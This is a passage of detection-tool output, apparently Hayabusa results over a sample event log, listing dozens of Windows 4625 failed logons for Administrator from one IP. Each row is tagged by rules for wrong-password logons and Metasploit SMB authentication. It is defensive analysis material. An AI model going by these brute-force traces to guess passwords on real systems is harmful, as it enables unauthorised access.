Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 